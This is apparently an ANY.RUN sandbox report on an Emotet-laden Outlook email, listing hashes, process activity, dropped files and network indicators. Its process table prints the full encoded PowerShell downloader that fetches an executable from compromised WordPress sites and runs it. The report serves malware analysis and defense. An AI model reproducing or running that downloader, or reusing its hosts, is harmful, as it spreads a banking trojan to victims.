analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FW Rettifica Informazioni - Bondarenko Petr.msg

Full analysis: https://app.any.run/tasks/dc4a5d2b-9898-4476-b29e-5e8091e5ae89
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 13:41:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet
emotet-doc
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

B87F1D15053C3B70A57D5017D78F3471

SHA1:

E97FBD12FE32AC167E105A320FBC7EC8F9C920EC

SHA256:

C954B1C4A807D15FF6EB42D110C3EFF11612E8CE9217372D1686465C73EEC2D7

SSDEEP:

6144:7u+grXwZAs3MpPxTqfVNinlGAiBqlMVO+:7u+grXwf3ExTqfXEeg+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 534.exe (PID: 3172)
      • 534.exe (PID: 3796)
      • msptermsizes.exe (PID: 2804)
      • msptermsizes.exe (PID: 1016)
    • Emotet process was detected

      • 534.exe (PID: 3796)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2464)
      • powershell.exe (PID: 3380)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2464)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3380)
      • 534.exe (PID: 3796)
    • PowerShell script executed

      • powershell.exe (PID: 3380)
    • Executed via WMI

      • powershell.exe (PID: 3380)
    • Application launched itself

      • 534.exe (PID: 3172)
    • Starts itself from another location

      • 534.exe (PID: 3796)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 2164)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2164)
      • OUTLOOK.EXE (PID: 2464)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start outlook.exe winword.exe no specs powershell.exe 534.exe no specs #EMOTET 534.exe msptermsizes.exe no specs msptermsizes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2464"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW Rettifica Informazioni - Bondarenko Petr.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Exit code:
0
Version:
14.0.6025.1000
2164"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\messaggio 102019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3380powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADMANQA0ADIANwAxADAANgBiADAAYgBiAD0AJwBiADgANgAwAGMAMQAwADkAMQA5ADAAOAA4ACcAOwAkAHgANwA3AGMAMwAwAGIAOQAzADMAMgAzACAAPQAgACcANQAzADQAJwA7ACQAYwAyADUANAA5ADcANQA2ADcAMQAyAGIANQA9ACcAYwAwADAAMAA5ADAAMwBjADcAMAA4ACcAOwAkAGMANAAwADgAeAB4ADcAMgAzAGIAYgAwADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHgANwA3AGMAMwAwAGIAOQAzADMAMgAzACsAJwAuAGUAeABlACcAOwAkAGIAMAA2ADUAMQAzAGIAMAA4ADAAMQAwAD0AJwBiADAAMAAwADEAMAA2AGIAMAAwADkANwAwACcAOwAkAGMANQB4AGIAOQA5ADAAMAAxADAAMAAwAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUATgBUADsAJABiADAAMwA0ADgAMAA1AHgAMwA3ADAAYwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHYAaQBiAGUAcwBjAHkAYQBoAGQAbwBuAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGQAMAA0AGwAMQAzADkANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbQBhAGMAdQBzAHQAaQBjAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHMAMQB1AHYANQA5ADYAMAAvAEAAaAB0AHQAcABzADoALwAvAHcAaABvAGIAdQB5AGoAdQBuAGsAYwBhAHIAcwAuAGMAbwBtAC8AYwBzAHMALwBmADUALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGQAaAB1AHIAZgByAHUAaQB0AHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAGoAMgA2AGgAOAB5ADAAMAA2ADgANQAvAEAAaAB0AHQAcAA6AC8ALwB3AGUAcwB0AGUAcgBuAHYAZQByAGkAZgB5AC4AYwBvAG0ALwB0AGUAbQBwAGwAYQB0AGUALwBwAGkAdgBwADgAMAA2ADQALwAnAC4AIgBTAGAAUABMAGkAdAAiACgAJwBAACcAKQA7ACQAYwA0AGIAMgAwAGIAOAA4ADAAMABiAD0AJwB4ADAANgAwADcAMAAwADIAOABjADUANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAYwA0ADgAYgA3ADYAMwBiADYANgA1ADIAMwAgAGkAbgAgACQAYgAwADMANAA4ADAANQB4ADMANwAwAGMAKQB7AHQAcgB5AHsAJABjADUAeABiADkAOQAwADAAMQAwADAAMAAuACIARABvAFcAYABOAGAATABPAEEAYABkAEYASQBMAEUAIgAoACQAYwA0ADgAYgA3ADYAMwBiADYANgA1ADIAMwAsACAAJABjADQAMAA4AHgAeAA3ADIAMwBiAGIAMAAwACkAOwAkAHgAOAA5ADcANAA5ADkAMAA1AGMAOAAyAD0AJwB4AGIAMABiADkAeAAwADAANAAwAHgAYwA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAYwA0ADAAOAB4AHgANwAyADMAYgBiADAAMAApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANgA1ADcAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAHIAdAAiACgAJABjADQAMAA4AHgAeAA3ADIAMwBiAGIAMAAwACkAOwAkAGIAMAA5ADAANwB4AGIAMgA5ADQAOQA9ACcAYgAyADIAMAAxAHgANgBjADMAOABiADQAJwA7AGIAcgBlAGEAawA7ACQAYwA3ADEAMwAwADcAYwA2ADkANwBiAD0AJwB4ADkANAAyADMANwA1AHgANgAwADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwBiADIAMQA4ADMANQAwADEAOQA1AGIAMAA9ACcAYwA2ADkAMABjADAANgA1ADAANAAwACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3172"C:\Users\admin\534.exe" C:\Users\admin\534.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3796--2a7737f4C:\Users\admin\534.exe
534.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
1016"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe534.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2804--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exemsptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
3 407
Read events
2 463
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
26
Unknown types
18

Dropped files

PID
Process
Filename
Type
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR630A.tmp.cvr
MD5:
SHA256:
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF2DDDB6C694A1CD11.TMP
MD5:
SHA256:
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF3AE074D325D71AE5.TMP
MD5:
SHA256:
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DFDB8EB65C9DB6AEAF.TMP
MD5:
SHA256:
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF4D155B13CD2273AA.TMP
MD5:
SHA256:
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{64772F5D-0B5B-4BA5-9B45-D3E6E2CC182F}.tmp
MD5:
SHA256:
2164WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR85E4.tmp.cvr
MD5:
SHA256:
2464OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:8D2C05E342D80D45A2641712FCD1AEC9
SHA256:3BE73515AC8F2B9E68CE7D628A9697BE0CFB2E22749E7AF94B7E464F7710F1FF
2464OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{9FA2D847-5525-4F8C-B818-C61FFF393140}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.pngimage
MD5:7D80C0A7E3849818695EAF4989186A3C
SHA256:72DC527D78A8E99331409803811CC2D287E812C008A1C869A6AEA69D7A44B597
2164WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:017A34D37378043269F76E512D0F7E78
SHA256:579FEE71E126726C0F8789893A2F48AF2E8F2A47FBBACB46772B450725A52E61
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3380
powershell.exe
107.180.54.252:80
www.vibescyahdone.com
GoDaddy.com, LLC
US
malicious
2464
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
www.vibescyahdone.com
  • 107.180.54.252
malicious

Threats

PID
Process
Class
Message
3380
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3380
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
3380
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3380
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info